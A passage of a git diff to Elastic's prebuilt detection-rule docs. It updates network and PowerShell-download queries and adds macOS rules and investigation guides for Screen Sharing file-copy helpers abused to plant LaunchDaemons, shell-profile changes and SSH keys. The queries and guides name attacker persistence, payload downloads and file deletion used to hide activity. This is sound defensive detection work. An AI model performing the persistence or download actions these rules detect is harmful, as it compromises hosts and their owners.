+ + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id, host.id with maxspan=30s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and + process.executable like ( + "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/run/*", "/var/run/*", "/var/www/*", + "/proc/*/fd/*", "?memfd:*", "memfd:*" + )] by process.executable + [file where host.os.type == "linux" and event.action == "deletion"] by file.path + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: File Deletion +** ID: T1070.004 +** Reference URL: https://attack.mitre.org/techniques/T1070/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/rare-connection-to-webdav-target.asciidoc b/docs/detections/prebuilt-rules/rule-details/rare-connection-to-webdav-target.asciidoc index 412050ceeb..3d8a31a03f 100644 --- a/docs/detections/prebuilt-rules/rule-details/rare-connection-to-webdav-target.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/rare-connection-to-webdav-target.asciidoc @@ -33,7 +33,7 @@ Identifies rare connection attempts to a Web Distributed Authoring and Versionin * Data Source: Crowdstrike * Resources: Investigation Guide -*Version*: 10 +*Version*: 11 *Rule authors*: @@ -111,14 +111,13 @@ from logs-endpoint.events.process-*, logs-windows.sysmon_operational-*, logs-sys process.name == "rundll32.exe" and process.command_line like "*DavSetCookie*" | keep host.id, process.command_line, user.name, user.id -// extract domain or IP address from process cmdline -| grok process.command_line """(?((http|https)://[a-zA-Z0-9-\.]{1,}\.[a-zA-Z]{2,3}[@\/]+)|(\b(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\b)[@\/]+)""" -// remove sub domains from URL -| eval Esql.server_webdav_server = REPLACE(Esql.server_webdav_server, """((http|https)://[a-zA-Z0-9-]{1,}\.)""", "") -| eval Esql.server_webdav_server = REPLACE(Esql.server_webdav_server, "/", "") +// extract the host from the WebDAV URL authority, excluding optional credentials and port +| grok process.command_line """(?i:https?)://(?:[^/@\s]+@)?(?[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*)""" +| eval Esql.server_webdav_server = TO_LOWER(Esql.server_webdav_server) | where Esql.server_webdav_server is not null and - not Esql.server_webdav_server in ("www.google.com", "www.elastic.co", "sharepoint.com", "live.net", "google.com", "SHAREPOINT.COM", "github.com") and + not Esql.server_webdav_server in ("www.google.com", "www.elastic.co", "google.com", "github.com", "www.github.com", "sharepoint.com", "live.net") and + not Esql.server_webdav_server like ("*.live.net", "*.sharepoint.com") and // excludes private IP ranges not Esql.server_webdav_server rlike """(10\.(\d{1,3}\.){2}\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.(\d{1,3}\.)\d{1,3}|192\.168\.(\d{1,3}\.)\d{1,3})""" | stats diff --git a/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-powershell.asciidoc index 7b2f76111c..533f63b860 100644 --- a/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-powershell.asciidoc @@ -1,7 +1,7 @@ [[remote-file-download-via-powershell]] === Remote File Download via PowerShell -Identifies powershell.exe being used to download an executable file from an untrusted remote destination. +Identifies PowerShell being used to download an executable file from an untrusted remote destination. *Rule type*: eql @@ -31,7 +31,7 @@ Identifies powershell.exe being used to download an executable file from an untr * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 116 +*Version*: 117 *Rule authors*: @@ -142,7 +142,7 @@ sequence by process.entity_id with maxspan=30s /* Filter out NetBIOS/LLMNR-style names (e.g. host, localhost, etc.) */ dns.question.name regex """.*\.[a-zA-Z]{2,5}"""] [file where host.os.type == "windows" and event.type == "creation" and - process.name : "powershell.exe" and + process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and (file.extension : ("exe", "dll", "ps1", "bat", "cmd", "vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta", "cpl", "scr", "pif", "com") or file.Ext.header_bytes : "4d5a*") and not file.name : "__PSScriptPolicy*.ps1" and not file.path : ( diff --git a/docs/detections/prebuilt-rules/rule-details/remote-ssh-login-enabled-via-systemsetup-command.asciidoc b/docs/detections/prebuilt-rules/rule-details/remote-ssh-login-enabled-via-systemsetup-command.asciidoc index d51826d16b..7f02c93677 100644 --- a/docs/detections/prebuilt-rules/rule-details/remote-ssh-login-enabled-via-systemsetup-command.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/remote-ssh-login-enabled-via-systemsetup-command.asciidoc @@ -34,11 +34,12 @@ Detects use of the systemsetup command to enable remote SSH Login. * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 112 +*Version*: 113 *Rule authors*: * Elastic +* Massimo Bertocchi *Rule license*: Elastic License v2 diff --git a/docs/detections/prebuilt-rules/rule-details/roshal-archive-rar-or-powershell-file-downloaded-from-the-internet.asciidoc b/docs/detections/prebuilt-rules/rule-details/roshal-archive-rar-or-powershell-file-downloaded-from-the-internet.asciidoc index 171172eac8..46a7089458 100644 --- a/docs/detections/prebuilt-rules/rule-details/roshal-archive-rar-or-powershell-file-downloaded-from-the-internet.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/roshal-archive-rar-or-powershell-file-downloaded-from-the-internet.asciidoc @@ -12,6 +12,7 @@ Detects a Roshal Archive (RAR) file or PowerShell script downloaded from the int * filebeat-* * logs-network_traffic.* * logs-panw.panos* +* logs-fortinet_fortigate.log-* *Severity*: medium @@ -34,10 +35,11 @@ Detects a Roshal Archive (RAR) file or PowerShell script downloaded from the int * Use Case: Threat Detection * Tactic: Command and Control * Domain: Endpoint +* Data Source: Fortinet * Data Source: PAN-OS * Resources: Investigation Guide -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -106,7 +108,8 @@ This activity has been observed in FIN7 campaigns. [source, js] ---------------------------------- -(data_stream.dataset: (network_traffic.http or network_traffic.tls) or +(data_stream.dataset: (network_traffic.http or network_traffic.tls or fortinet_fortigate.log) or + (data_stream.dataset: panw.panos and network.application: "web-browsing") or (event.category: (network or network_traffic) and network.protocol: http)) and (url.extension:(ps1 or rar) or url.path:(*.ps1 or *.rar)) and not destination.ip:( diff --git a/docs/detections/prebuilt-rules/rule-details/rpc-remote-procedure-call-from-the-internet.asciidoc b/docs/detections/prebuilt-rules/rule-details/rpc-remote-procedure-call-from-the-internet.asciidoc index f22bbdcacf..c0fbd2921e 100644 --- a/docs/detections/prebuilt-rules/rule-details/rpc-remote-procedure-call-from-the-internet.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/rpc-remote-procedure-call-from-the-internet.asciidoc @@ -9,6 +9,7 @@ This rule detects network events that may indicate the use of RPC traffic from t * logs-network_traffic.* * logs-panw.panos* +* logs-fortinet_fortigate.log-* * logs-pfsense.log-* * logs-zeek.* * logs-corelight.* @@ -33,13 +34,14 @@ This rule detects network events that may indicate the use of RPC traffic from t * Domain: Endpoint * Use Case: Threat Detection * Data Source: Corelight +* Data Source: Fortinet * Data Source: Network Traffic * Data Source: PAN-OS * Data Source: pfSense * Data Source: Zeek * Resources: Investigation Guide -*Version*: 112 +*Version*: 113 *Rule authors*: @@ -101,7 +103,7 @@ RPC enables remote management and resource sharing, crucial for system administr [source, js] ---------------------------------- -(data_stream.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow) or event.category:(network or network_traffic)) and network.transport:tcp and (destination.port:135 or data_stream.dataset:zeek.dce_rpc) and not (event.type: denied or event.action: flow_dropped or event.outcome: failure) and not source.ip:( diff --git a/docs/detections/prebuilt-rules/rule-details/rpc-remote-procedure-call-to-the-internet.asciidoc b/docs/detections/prebuilt-rules/rule-details/rpc-remote-procedure-call-to-the-internet.asciidoc index accb1f41b7..2333eba485 100644 --- a/docs/detections/prebuilt-rules/rule-details/rpc-remote-procedure-call-to-the-internet.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/rpc-remote-procedure-call-to-the-internet.asciidoc @@ -9,6 +9,7 @@ This rule detects network events that may indicate the use of RPC traffic to the * logs-network_traffic.* * logs-panw.panos* +* logs-fortinet_fortigate.log-* * logs-pfsense.log-* * logs-zeek.* * logs-corelight.* @@ -34,13 +35,14 @@ This rule detects network events that may indicate the use of RPC traffic to the * Domain: Endpoint * Use Case: Threat Detection * Data Source: Corelight +* Data Source: Fortinet * Data Source: PAN-OS * Data Source: Network Traffic * Data Source: pfSense * Data Source: Zeek * Resources: Investigation Guide -*Version*: 111 +*Version*: 112 *Rule authors*: @@ -102,7 +104,7 @@ RPC enables remote management and resource sharing across networks, crucial for [source, js] ---------------------------------- -(data_stream.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow) or event.category:(network or network_traffic)) and network.transport:tcp and (destination.port:135 or data_stream.dataset:zeek.dce_rpc) and source.ip:( 10.0.0.0/8 or diff --git a/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc b/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc index 1eaa17d875..0690abd069 100644 --- a/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc @@ -40,11 +40,12 @@ Identifies the use of a compression utility to collect known files containing se * Data Source: Auditd Manager * Resources: Investigation Guide -*Version*: 215 +*Version*: 216 *Rule authors*: * Elastic +* Massimo Bertocchi *Rule license*: Elastic License v2 diff --git a/docs/detections/prebuilt-rules/rule-details/smb-windows-file-sharing-activity-from-the-internet.asciidoc b/docs/detections/prebuilt-rules/rule-details/smb-windows-file-sharing-activity-from-the-internet.asciidoc index 5e0680f9c4..95f6cbda66 100644 --- a/docs/detections/prebuilt-rules/rule-details/smb-windows-file-sharing-activity-from-the-internet.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/smb-windows-file-sharing-activity-from-the-internet.asciidoc @@ -10,6 +10,7 @@ This rule detects network events that may indicate inbound Windows file sharing * logs-corelight.* * logs-network_traffic.* * logs-panw.panos* +* logs-fortinet_fortigate.log-* * logs-pfsense.log-* * logs-zeek.* @@ -34,13 +35,14 @@ This rule detects network events that may indicate inbound Windows file sharing * Domain: Network * Use Case: Threat Detection * Data Source: Corelight +* Data Source: Fortinet * Data Source: PAN-OS * Data Source: Network Traffic * Data Source: pfSense * Data Source: Zeek * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -99,6 +101,7 @@ This rule requires network flow or firewall log data that captures inbound TCP c - **Elastic Network Traffic** integration (Packetbeat) - **Corelight** integration (network and SMB telemetry) +- **Fortinet FortiGate** integration (firewall traffic logs) - **PAN-OS** integration (Palo Alto Networks firewall logs) - **pfSense** integration (syslog-based firewall flow logs; requires pfSense syslog forwarding enabled) - **Zeek** integration (SMB-specific log types: `smb_cmd`, `smb_files`, `smb_mapping`) @@ -110,7 +113,7 @@ For pfSense, ensure the firewall logging rules are configured to log connection This rule requires network flow or firewall log data that captures inbound TCP connections with 5-tuple information (source IP, destination IP, destination port). Compatible data sources include: -Elastic Network Traffic integration (Packetbeat)Corelight integration (network and SMB telemetry)PAN-OS integration (Palo Alto Networks firewall logs)pfSense integration (syslog-based firewall flow logs; requires pfSense syslog forwarding enabled)Zeek integration (SMB-specific log types: `smb_cmd`, `smb_files`, `smb_mapping`) +Elastic Network Traffic integration (Packetbeat)Corelight integration (network and SMB telemetry)Fortinet FortiGate integration (firewall traffic logs)PAN-OS integration (Palo Alto Networks firewall logs)pfSense integration (syslog-based firewall flow logs; requires pfSense syslog forwarding enabled)Zeek integration (SMB-specific log types: `smb_cmd`, `smb_files`, `smb_mapping`) For pfSense, ensure the firewall logging rules are configured to log connection events and that the Elastic pfSense integration is forwarding logs to the `logs-pfsense.log-*` data stream. ==== Rule query @@ -118,7 +121,7 @@ For pfSense, ensure the firewall logging rules are configured to log connection [source, js] ---------------------------------- -(data_stream.dataset:(network_traffic.flow or zeek.smb_cmd or zeek.smb_files or zeek.smb_mapping or pfsense.log) or event.category:(network or network_traffic)) +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow or pfsense.log or zeek.smb_cmd or zeek.smb_files or zeek.smb_mapping) or event.category:(network or network_traffic)) and network.transport:tcp and destination.port:(139 or 445) and destination.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) and not source.ip:( diff --git a/docs/detections/prebuilt-rules/rule-details/smb-windows-file-sharing-activity-to-the-internet.asciidoc b/docs/detections/prebuilt-rules/rule-details/smb-windows-file-sharing-activity-to-the-internet.asciidoc index 23c0000df9..114f57d070 100644 --- a/docs/detections/prebuilt-rules/rule-details/smb-windows-file-sharing-activity-to-the-internet.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/smb-windows-file-sharing-activity-to-the-internet.asciidoc @@ -9,6 +9,7 @@ This rule detects network events that may indicate the use of Windows file shari * logs-network_traffic.* * logs-panw.panos* +* logs-fortinet_fortigate.log-* * logs-pfsense.log-* * logs-zeek.* * logs-corelight.* @@ -34,13 +35,14 @@ This rule detects network events that may indicate the use of Windows file shari * Domain: Network * Use Case: Threat Detection * Data Source: Corelight +* Data Source: Fortinet * Data Source: PAN-OS * Data Source: Network Traffic * Data Source: pfSense * Data Source: Zeek * Resources: Investigation Guide -*Version*: 112 +*Version*: 113 *Rule authors*: @@ -103,7 +105,7 @@ SMB, a protocol for sharing files and resources within trusted networks, is vuln [source, js] ---------------------------------- -(data_stream.dataset:(network_traffic.flow or zeek.smb_cmd or zeek.smb_files or zeek.smb_mapping) or event.category:(network or network_traffic)) +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow or zeek.smb_cmd or zeek.smb_files or zeek.smb_mapping) or event.category:(network or network_traffic)) and network.transport:tcp and destination.port:(139 or 445) and source.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) and not destination.ip:(10.0.0.0/8 diff --git a/docs/detections/prebuilt-rules/rule-details/smtp-to-the-internet-on-port-26-tcp.asciidoc b/docs/detections/prebuilt-rules/rule-details/smtp-to-the-internet-on-port-26-tcp.asciidoc index 370c28b6ad..22cc4b0a28 100644 --- a/docs/detections/prebuilt-rules/rule-details/smtp-to-the-internet-on-port-26-tcp.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/smtp-to-the-internet-on-port-26-tcp.asciidoc @@ -9,6 +9,7 @@ This rule detects events that may indicate use of SMTP on TCP port 26 from an in * logs-network_traffic.* * logs-panw.panos* +* logs-fortinet_fortigate.log-* * logs-pfsense.log-* * logs-zeek.* * logs-corelight.* @@ -35,13 +36,14 @@ This rule detects events that may indicate use of SMTP on TCP port 26 from an in * Domain: Endpoint * Use Case: Threat Detection * Data Source: Corelight +* Data Source: Fortinet * Data Source: PAN-OS * Data Source: Network Traffic * Data Source: pfSense * Data Source: Zeek * Resources: Investigation Guide -*Version*: 113 +*Version*: 114 *Rule authors*: @@ -103,7 +105,7 @@ SMTP, typically operating on port 25, is crucial for email transmission. However [source, js] ---------------------------------- -(data_stream.dataset: (network_traffic.flow or zeek.smtp) or event.category:(network or network_traffic)) and +(data_stream.dataset: (fortinet_fortigate.log or network_traffic.flow or zeek.smtp) or event.category:(network or network_traffic)) and network.transport:tcp and destination.port:26 and source.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) and not destination.ip:(10.0.0.0/8 diff --git a/docs/detections/prebuilt-rules/rule-details/ssfilecopyreceiver-writing-to-common-persistence-locations.asciidoc b/docs/detections/prebuilt-rules/rule-details/ssfilecopyreceiver-writing-to-common-persistence-locations.asciidoc new file mode 100644 index 0000000000..9da8dad2d8 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/ssfilecopyreceiver-writing-to-common-persistence-locations.asciidoc @@ -0,0 +1,194 @@ +[[ssfilecopyreceiver-writing-to-common-persistence-locations]] +=== SSFileCopyReceiver Writing to Common Persistence Locations + +Identifies the macOS Screen Sharing file copy helper SSFileCopyReceiver creating or modifying files in common persistence locations, including system-wide and per-user LaunchDaemons/LaunchAgents, shell profiles, SSH authorized_keys, cron tabs, and hidden paths under root's home directory. SSFileCopyReceiver performs file writes with root authority on behalf of a remote viewer.Pre-authentication exploitation of the Screen Sharing service (CVE-2026-65400) abuses this write primitive to establish persistence; observed in-the-wild activity dropped LaunchDaemons and modified shell startup files to run a cryptocurrency miner as root. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.huntress.com/blog/macos-screen-sharing-rce-patched +* https://nvd.nist.gov/vuln/detail/CVE-2026-65400 +* https://support.apple.com/en-us/HT201222 + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Persistence +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating SSFileCopyReceiver Writing to Common Persistence Locations* + + +This rule spots the macOS Screen Sharing file copy helper writing into locations that commonly grant persistence, such as launch items, shell startup files, SSH access files, scheduled task tabs, and hidden directories under root’s home. It matters because this helper performs writes as root for a remote session, so an attacker can exploit Screen Sharing and drop a LaunchDaemon plist or alter .zshrc to start a miner or backdoor every boot or login. + + +*Possible investigation steps* + + +- Review the exact contents and recent versions of the written plist, shell startup file, cron tab, hidden root file, or SSH key file for persistence logic such as RunAtLoad or KeepAlive settings, embedded download commands, unexpected SSH public keys, or references to miner, shell, or staging paths. +- Correlate the file write time with Screen Sharing and VNC access evidence in Unified Logs, authentication records, and inbound network activity to determine whether the change aligns with an approved remote support session or an unsolicited access attempt consistent with exploitation. +- Confirm whether the persistence has executed by examining loaded launchd jobs, recent root-level child processes, and any binaries or scripts referenced by the modified artifact, prioritizing unknown executables, curl or bash chains, and long-running resource-intensive processes. +- Validate the dropped or referenced payloads by collecting hashes, code-signing and notarization status, ownership and permissions, and comparing them to known-good administration tools, approved software, and recent change tickets. +- Scope impact and remediate by hunting fleet-wide for the same plist labels, SSH keys, file hashes, payload paths, and Screen Sharing write patterns, then isolate affected hosts, remove unauthorized persistence, revoke added access, and update or disable exposed Screen Sharing services until patched. + + +*False positive analysis* + + +- A legitimate administrator using macOS Screen Sharing may copy an approved LaunchDaemon or LaunchAgent plist during remote maintenance or software rollout; verify the session was expected and that the plist label, referenced executable, ownership, and signing details match authorized system changes. +- A user support session can legitimately update a shell profile or SSH authorized_keys file to restore access or set environment defaults; confirm the request with the user or admin and review the added commands or keys to ensure they belong to known accounts and do not launch unexpected binaries. + + +*Related Rules* + + +- SSFileCopySender Executed as Root - e54c3f36-e243-402d-9d44-8f7349eb8c88 + + +*Response and remediation* + + +- Isolate the affected Mac from the network, stop any malicious launchd job, miner, or shell started from the newly written LaunchDaemon, LaunchAgent, shell profile, cron tab, hidden root file, or added SSH key, and preserve the modified files and referenced payloads as evidence. +- Remove attacker persistence by deleting unauthorized plist files from /Library/LaunchDaemons or LaunchAgents, reverting changes to .zshrc, .bash_profile, and other startup files, removing unapproved entries from authorized_keys and /var/at/tabs, and unloading any matching launchd services. +- Restore the host to a known-good state by replacing altered configuration files from a trusted backup or gold image, reinstalling any trojanized binaries referenced by the persistence item, and validating ownership, permissions, and code-signing on the restored files. +- Escalate to incident response immediately if the same plist label, SSH public key, payload hash, or Screen Sharing write pattern is found on additional systems, if root-level processes continue after cleanup, or if you identify signs of credential theft or lateral movement. +- Harden the environment by patching or disabling Screen Sharing where it is not required, restricting remote management exposure with firewall and access controls, rotating credentials and SSH keys that may have been added or abused, and monitoring for new writes to LaunchDaemons, shell profiles, cron tabs, and hidden paths under root’s home. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a macOS System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, for MacOS it is recommended to select "Traditional Endpoints". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/current/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.file-* METADATA _id, _index, _version +| WHERE host.os.type == "macos" + AND event.type != "deletion" + AND process.name == "SSFileCopyReceiver" + AND ( + file.path LIKE "/Library/LaunchDaemons/*.plist" + OR file.path LIKE "/Library/LaunchAgents/*.plist" + OR file.path LIKE "/Users/*/Library/LaunchAgents/*.plist" + OR file.path LIKE "/private/var/*/Library/LaunchAgents/*.plist" + OR file.name IN (".zshenv", ".zshrc", ".zprofile", ".zlogin", ".bashrc", ".bash_profile", ".bash_login", ".profile", "config.fish", "environment.plist") + OR file.path LIKE "/Users/*/.ssh/authorized_keys" + OR file.path LIKE "/private/var/root/.ssh/authorized_keys" + OR file.path LIKE "/private/etc/ssh/sshd_config*" + OR file.path LIKE "/private/var/at/tabs/*" + OR file.path LIKE "/var/at/tabs/*" + OR file.path LIKE "/private/var/root/.*/*" + OR file.path LIKE "/var/root/.*/*" + OR file.path LIKE "/private/var/root/.*" + OR file.path LIKE "/var/root/.*" + ) +| KEEP _id, _index, _version, + @timestamp, host.name, host.id, user.id, user.name, process.name, + event.action, event.type, file.path, file.name, data_stream.namespace + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Launch Agent +** ID: T1543.001 +** Reference URL: https://attack.mitre.org/techniques/T1543/001/ +* Sub-technique: +** Name: Launch Daemon +** ID: T1543.004 +** Reference URL: https://attack.mitre.org/techniques/T1543/004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Unix Shell Configuration Modification +** ID: T1546.004 +** Reference URL: https://attack.mitre.org/techniques/T1546/004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: SSH Authorized Keys +** ID: T1098.004 +** Reference URL: https://attack.mitre.org/techniques/T1098/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/ssfilecopysender-executed-as-root.asciidoc b/docs/detections/prebuilt-rules/rule-details/ssfilecopysender-executed-as-root.asciidoc new file mode 100644 index 0000000000..0e03ee1030 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/ssfilecopysender-executed-as-root.asciidoc @@ -0,0 +1,174 @@ +[[ssfilecopysender-executed-as-root]] +=== SSFileCopySender Executed as Root + +Identifies execution of the macOS Screen Sharing file-copy helper SSFileCopySender with root UID/GID attributes (0 80). Under the native Apple authentication path this helper runs in the connecting user's context; execution as root is anomalous and consistent with pre-authentication exploitation of the Screen Sharing service (CVE-2026-65400), where a flawed SRP validation path lets an unauthenticated attacker reach privileged file operations. Note that the 0/80 UID/GID pair reflects only initial exploitation attempts and can be evaded once an attacker enumerates another local account. It is advisable to treat this as a tripwire and pair it with the SSFileCopyReceiver Writing to Common Persistence Locations rule coverage. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.huntress.com/blog/macos-screen-sharing-rce-patched +* https://nvd.nist.gov/vuln/detail/CVE-2026-65400 +* https://support.apple.com/en-us/HT201222 + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Initial Access +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating SSFileCopySender Executed as Root* + + +This detects the macOS Screen Sharing file-copy helper starting with root privileges, which is abnormal because legitimate file transfers run in the remote user’s context. That pattern matters because it strongly suggests a pre-authentication Screen Sharing exploit path that lets an unauthenticated attacker invoke privileged file operations, for example by reaching the service over the network and copying a payload into /Library/LaunchDaemons before any user logs in. + + +*Possible investigation steps* + + +- Correlate the alert time with unified logs, firewall records, and endpoint network telemetry to identify the source IP that reached Screen Sharing and determine whether the connection came from an unexpected internal or external host. +- Reconstruct the 5–10 minute execution timeline around the event to capture the launch context and any follow-on activity such as shell, scripting, download, archive, permission-change, or service-management commands. +- Review concurrent and subsequent file activity for newly written or modified items in common staging and persistence paths such as /Library/LaunchDaemons, /Library/LaunchAgents, /Library/PrivilegedHelperTools, /Users/Shared, and temporary directories, and collect hashes for any payloads. +- Validate whether any legitimate remote administration or support session was expected on the host and compare that with authentication and user-session records to spot execution without a corresponding successful login or a rapid pivot to another local account. +- Scope for broader exploitation by confirming whether Screen Sharing or Remote Management was enabled, checking the host’s patch status for CVE-2026-65400, and searching for the same source IP or related indicators across other macOS systems. + + +*False positive analysis* + + +- An authorized administrator may manually invoke SSFileCopySender as root during macOS Screen Sharing troubleshooting or control validation; verify the parent process is an expected local shell or maintenance script, the activity aligns with a documented change window, and there are no unexpected follow-on file writes. +- A lab or staging Mac used for patch verification or regression testing may intentionally exercise the Screen Sharing file-copy helper with the 0/80 arguments; verify the host’s role, confirm the timing matches approved test activity, and ensure any related network source and copied files are expected. +- Legacy VNC authentication runs SSFileCopySender in a root context, so root-context execution alone is expected and this rule will fire on benign legacy-VNC sessions. Treat it as a lead, not a finding and corroborate with a near-in-time "SSFileCopyReceiver Writing to Common Persistence Locations" alert on the same host before take an action. + + +*Related Rules* + + +- SSFileCopyReceiver Writing to Common Persistence Locations - 5773cef4-11a5-4d51-a40b-0e0a79d68432 + + +*Response and remediation* + + +- Immediately isolate the affected Mac from the network, disable Screen Sharing and Remote Management on the host, and block the identified source IP or access path while preserving relevant logs and suspicious files for follow-up analysis. +- Remove attacker footholds by unloading and deleting unauthorized launchd items from /Library/LaunchDaemons and /Library/LaunchAgents, removing rogue binaries from /Library/PrivilegedHelperTools, /Users/Shared, and temporary directories, and deleting any unknown local accounts or added SSH authorized_keys. +- Restore the system to a known-good state by reimaging the host or recovering from a trusted backup if SSFileCopySender was followed by writes to privileged locations, modified system settings, or execution of additional 